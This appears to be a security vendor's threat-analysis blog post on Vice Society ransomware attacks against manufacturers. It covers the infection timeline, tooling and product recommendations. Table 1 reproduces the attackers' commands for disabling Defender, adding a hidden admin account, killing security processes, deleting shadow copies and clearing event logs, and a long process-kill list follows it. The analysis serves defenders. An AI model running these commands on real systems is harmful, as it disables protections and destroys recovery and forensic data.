Vice Society Ransomware Group Targets Manufacturing Companies

[Link] Figure 2. Trend Micro ™ Smart Protection Network ™ (SPN) detections for Vice Society from November 2022 to January 2023 (unique endpoints)

[Link] Figure 3. Distribution of affected industries based on the Vice Society leak site

Technical analysis and infection flow

Based on our internal telemetry, we were able to create infection diagram for a Vice Society ransomware attack (illustrated in Figure 4). The arrival vector likely involves the exploitation of a public-facing website or abuse of compromised remote desktop protocol (RDP) credentials.

[Link] Figure 4. The infection chain of a Vice Society attack

The following table shows what we were able to observe from a Vice Society attack. Note that all endpoints indicated belong to one Pointer to the GUID.

Date	Description
October 28, 2022	Possible entry point using Cobalt Strike and the Rubeus hacktool Cobalt Strike connects to 57thandnormal[.]com
November 12, 2022	Deployed Zeppelin ransomware Path: C:\mnt\smile.exe
November 12, 2022	Copied files kape.exe --tsource C --target RecycleBin --tdest output --zip RecycleBin_{ComputerName}
November 12, 2022	Deployed Mimikatz Path: C:\ProgramData\toolkiit\{redacted}\output\C\ $Recycle.Bin\{redacted}\$RY0DNVE.exe
November 12, 2022	Executed a PowerShell script (w1.ps1) Command: /c powershell.exe -ExecutionPolicy Bypass -file \\{ComputerName}\s$\w1.ps1 -ExecutionPolicy Bypass -file \\{ComputerName}\s$\w1.ps1
November 12, 2022	Disabled antivirus (AV) programs such as Trend Micro Apex One and Windows Defender /i \\{ComputerName}\netlogon\ApexOneCloud\agent_cloud_x64.msi /quiet add "HKLM\Software\Policies\Microsoft\Windows Defender" /v DisableAntiVirus /t REG_DWORD /d 1 /f add "HKLM\Software\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v MpEnablePus /t REG_DWORD /d 0 /f
November 12, 2022	Deployed Vice Society ransomware Path: C:\ProgramData\test.exe
November 12, 2022	Created Administrator account on each endpoint, add to Administrators and Remote Desktop Users localgroup user Administrator {password} /add user Administrator {password} /add localgroup Administrators Administrator /ADD localgroup "Remote Desktop Users" Administrator /ADD add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" /v Administrator /t REG_DWORD /d 0 /f
November 12, 2022	Terminated processes such as AV and security software. process where "name like '%Agent%'" delete process where "name like '%Malware%'" delete process where "name like '%Endpoint%'" delete process where "name like '%sql%'" delete process where "name like '%Veeam%'" delete process where "name like '%Core.Service%'" delete
November 12, 2022	Exfiltrated important files
November 12, 2022	Multiple deployments of Vice Society ransomware was dropped in the %Temp% directory on different endpoints Path: C:\windows\temp\svchost.exe
November 12, 2022	Observed file infector Neshta
November 12, 2022	Performed ransomware routine via $mytemp$\svchost.exe "/c vssadmin.exe Delete Shadows /All /Quiet
November 12, 2022	Vice Society ransomware routine is performed (files are encrypted, ransom note with email contacts is dropped and files are appended with the extension .v1cesO0ciety) Ransom note: AllYFilesAE! Extension: .v1cesO0ciety Contact email of ransom operators: 876505846904@onionmail[.]org 316186524106@onionmail[.]org v-society.official@onionmail[.]org
November 12, 2022	Event viewer logs and remote session traces such as RDP and terminal services were cleared reg delete ""HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default"" /va /f reg delete ""HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers"" /f reg add ""HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers"" cd %userprofile%\documents\ attrib Default.rdp -s -h del Default.rdp for /F ""tokens=*"" %1 in ('wevtutil.exe el') DO wevtutil.exe cl ""%1"""
November 12, 2022	Deleted itself from the system "%System%\cmd.exe" /c del {Malware File Path}\{Malware File Name} -> nul -> to delete itself

Table 1. Date and description of the routines involved in a Vice Society attack

The weaponized tool used by Vice Society is Cobalt Strike, which allows the group to remotely access and control the infected endpoint. The threat actor also used the Rubeus C# toolset for raw Kerberos interaction and abuse (although this is not a new technique, since it has been previously used by Ryuk, Conti, and BlackCat).

To laterally move within the target network, Mimikatz was used to dump passwords and the Kape tool for copying files. We also observed the presence of the Zeppelin ransomware from another endpoint that also uses Kape for data exfiltration. Vice Society was known to have deployed Zeppelin before, however, perhaps due to its weaker encryption, the threat actor decided to go with custom-built ransomware.

Vice Society will then execute a PowerShell script to create an administrator account that allows for the remote access of other endpoints and to terminate several processes such as running security software before dropping the custom-built ransomware. In most of the ViceSociety detections we also observed the presence of Neshta file infector (which can be cleaned by Trend Micro), although it is not clear how this occurred.

Virtual servers, such as Microsoft Hyper-V, are also affected in this attack. We also found the attacker removing traces of RDP sessions such as wevtutil.exe, a technique that was previously used by Clop ransomware and KillDisk.

[Link]

[Link] Figure 5. The ransomware note (top) and desktop ransom message (bottom) displayed on the victim's machine

[Link] Figure 6. The primary TOR website and mirror links

[Link] Figure 7. Vice Society's file storage site

Once the administrator account is added and established, Vice Society can terminate several processes, including security-related ones, to enable the successful deployment and execution of its ransomware on the affected endpoints.

• %Agent%
• %Malware%
• %Endpoint%
• %sql%
• %Veeam%
• %Core.Service%
• %Mongo%
• %Backup%
• %QuickBooks%
• %QBDB%
• %QBData%
• %QBCF%
• %Kaspersky%
• %server%
• %sage%
• %http%
• %apache%
• %segurda%
• %center%
• %silverlight%
• %exchange%
• %manage%
• %acronis%
• %autodesk%
• %database%
• %firefox%
• %chrome%
• %barracuda%
• %arcserve%
• %sprout%
• %anydesk%
• %protect%
• %secure%
• %adobe%
• %java%
• %logmein%
• %microsoft%
• %solarwinds%
• %engine%
• %web%
• %vnc%
• %teamviewer%
• %OCSInventory%
• %monitor%
• %security%
• %def%
• %dev%
• %office%
• %Framework%
• %AlwaysOn%
• %Agent%
• %Malware%
• %Endpoint%
• %sql%
• %Veeam%
• %acronis%
• %autodesk%
• %database%
• %adobe%
• %java%
• %logmein%
• %microsoft%
• %solarwinds%
• %engine%
• %QBDB%
• %QBData%
• %QBCF%
• %Kaspersky%
• %server%
• %sage%
• %http%
• %apache%
• %web%
• %vnc%
• %AlwaysOn%
• %Framework%
• %sprout%
• %firefox%
• %chrome%
• %barracuda%
• %arcserve%
• %exchange%
• %manage%
• %Core.Service%
• %Mongo%
• %Backup%
• %QuickBooks%
• %teamviewer%
• %OCSInventory%
• %monitor%
• %security%
• %def%
• %dev%
• %office%
• %anydesk%
• %protect%
• %secure%
• %segurda%
• %center%
• %silverlight%

Conclusion and Trend Micro solutions

Vice Society seems to be constantly improving their capabilities, managing to build their own custom-built ransomware while also continuing to employ toolsets such as Cobalt Strike and malware such as Zeppelin and Hello Kitty/FiveHands to enhance their routines. Furthermore, the use of the Kape tool can speed up the identification of important files from a computer. Given what we know of the group's technical knowledge and their willingness to target several different industries and regions, we can expect them to remain a significant player in the ransomware landscape and a threat that organizations must keep track of moving forward.

A multilayered approach can help organizations guard possible entry points into their system, such as endpoints, emails, web, and networks. The following security solutions can detect malicious components and suspicious behavior, which can help protect enterprises.

• Trend Micro Vision One™ provides multilayered protection and behavior detection, which helps block questionable behavior and tools early on before the ransomware can do irreversible damage to the system.
• Trend Micro Cloud One™ Workload Security protects systems against both known and unknown threats that exploit vulnerabilities. This protection is made possible through techniques such as virtual patching and machine learning.
• Trend Micro™ Deep Discovery™ Email Inspector employs custom sandboxing and advanced analysis techniques to effectively block malicious emails, including phishing emails that can serve as entry points for ransomware.
• Trend Micro Apex One™ offers next-level automated threat detection and response against advanced concerns such as fileless threats and ransomware, ensuring the protection of endpoints.
  

Indicators of Compromise

The indicators of compromise for this blog entry can be found here.